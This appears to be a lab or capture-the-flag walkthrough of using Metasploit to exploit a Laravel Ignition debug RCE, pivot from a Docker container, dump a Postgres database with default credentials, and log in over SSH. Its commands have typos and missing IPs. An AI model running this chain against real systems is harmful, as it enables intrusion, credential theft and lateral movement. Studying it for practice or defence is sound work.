
When there is a /.dockerenv in the root directory of the filesystem its a most probably a docker container.


On Kali Metasploit is already installed: msfconsole

Common commands:

# To search for a module, use the ‘search’ command:
msf6 > search laravel

# Load a module with the ‘use’ command
msf6 > use multi/php/ignition_laravel_debug_rce

# view the information about the module, including the module options, description, CVE details, etc
msf6 exploit(multi/php/ignition_laravel_debug_rce) > info

Within a module:

# View the available options to set
show options

# Set the target host and logging
set rhost
set verbose true

# Set the payload listening address; this is the IP address of the host running Metasploit
set lhost LISTEN_IP

# show options again
show options

# Run or check the module

Metasploit has its own routing table which allows to rout traffic from your host to a metasploit session.

Socks Proxy

You can run a proxy within Metasploit and even on a compromised machine.

some commands like curl supports using a proxy like this: curl --proxy socks4a://localhost:9050 http://MACHINE_IP And if the tool doesn’t support it, you can use proxychains: roxychains -q nmap -n -sT -Pn -p 22,80,443,5432 MACHINE_IP


After metasploit exploited a target it opens a session. A session can be upgraded to a meterpreter session.


Is a payload which enables interactive access to a compromised computer.

Network pivoting

When you gained a entrypoint into a system you can run network scanning tools like nmap and arp to find additional machines which where not reachable previously.


Starting with nmap on the target: nmap -T4 -A -Pn gives us the open port 80 with apache behind it. nmap_start

Seems like we can just open a website on port 80. This gives us the info that laravel is used. laravel

Run Metasploit: msfconsole Run search laravel Run use exploit/multi/php/ignition_laravel_debug_rce


Within the module: Run show info Run check RHOSTS= HttpClientTimeout=20 laravel

We need to check our own ip address by running ip addr in normal console. ip addr

within the laravel module, lets run: un RHOSTS= LHOST= HttpClientTimeout=20 metasploit run

Lets put the session into background and list all sessions: metasploit background

Now we upgrade the last session to meterpreter session: sessions -u -1 and read an .env file metasploit background

we resolve the found webservice into IP address: resolve webservice_databse This means there is another host on the network and we can pivoting to it. metasploit background

We also see that we are in a docker container In a docker container

Now we add a route on metasploit: route add -1 We also add the route for the dockers default ip address to connect resources on its host: route add -1

# Dump the schema
use auxiliary/scanner/postgres/postgres_schemadump
run postgres://postgres:postgres@

# Select information from a specific table
use auxiliary/admin/postgres/postgres_sql
run postgres://postgres:postgres@ sql='select * from users'

Schemadump SQL command

Now we can run something like this: curl --proxy socks4a://localhost:9050 -v The proxy will route this traffic to our target and the target will call its host machine.

We can now scan the targets host system: proxychains -q nmap -n -sT -Pn -p 22,80,443,5432

nmap target host We see that SSH port is open on the host machine.

Using the username and password we got from the database: run ssh://santa:p4$$w0rd@ nmap target host
